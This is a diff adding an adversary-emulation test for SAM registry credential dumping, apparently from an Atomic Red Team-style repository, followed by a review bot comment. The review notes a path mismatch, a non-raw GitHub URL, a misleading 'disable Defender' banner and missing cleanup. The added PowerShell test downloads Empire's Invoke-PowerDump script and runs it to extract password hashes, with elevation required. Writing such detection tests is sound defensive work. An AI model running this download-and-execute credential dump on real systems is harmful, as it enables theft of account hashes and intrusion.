diff --git a/atomics/T1003.002/T1003.002.yaml b/atomics/T1003.002/T1003.002.yaml
index ae3312a1..5ba30d65 100644
--- a/atomics/T1003.002/T1003.002.yaml
+++ b/atomics/T1003.002/T1003.002.yaml
@@ -78,4 +78,18 @@ atomic_tests:
 del #{copy_dest}\#{file_name} & esentutl.exe /y /vss #{file_path} /d #{copy_dest}/#{file_name}
 name: command_prompt
 elevation_required: true
-
\ No newline at end of file
+
+- name: PowerDump Registry dump of SAM for hashes and usernames
+ description: Executes a hashdump by reading the hasshes from the registry.
+ supported_platforms:
+ - windows
+ executor:
+ command: |-
+ Write-Host "STARTING TO SET BYPASS and DISABLE DEFENDER REALTIME MON" -fore green
+ Set-ExecutionPolicy -Scope CurrentUser -ExecutionPolicy RemoteSigned -ErrorAction Ignore
+ Invoke-Webrequest -Uri "https://github.com/BC-SECURITY/Empire/blob/c1bdbd0fdafd5bf34760d5b158dfd0db2bb19556/data/module_source/credentials/Invoke-PowerDump.ps1" -UseBasicParsing -OutFile "$Env:Temp\PowerDump.ps1"
+ Import-Module .\PowerDump.ps1
+ Invoke-PowerDump
+ name: powershell
+ elevation_required: true
+
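Review bot: `Import-Module .\PowerDump.ps1` resolves against the current working directory, while the preceding `Invoke-Webrequest` writes the script to `$Env:Temp\PowerDump.ps1`, so the import fails unless the test happens to run from that directory; use the same path on both lines, e.g. `Import-Module "$Env:Temp\PowerDump.ps1"`. The `-Uri` is a GitHub `blob` page URL, which serves an HTML page rather than the script itself, so the downloaded file would not import even with the path fixed; presumably the raw-file URL for that same pinned commit is what was intended. The `Write-Host` banner announces disabling Defender real-time monitoring, but nothing in the command does that, so the message only misleads whoever reads the test output or correlates it with telemetry; reword it to describe what actually runs. The test also leaves the downloaded script and a persisted CurrentUser execution-policy change behind with no `cleanup_command`, and the description has a typo (`hasshes`).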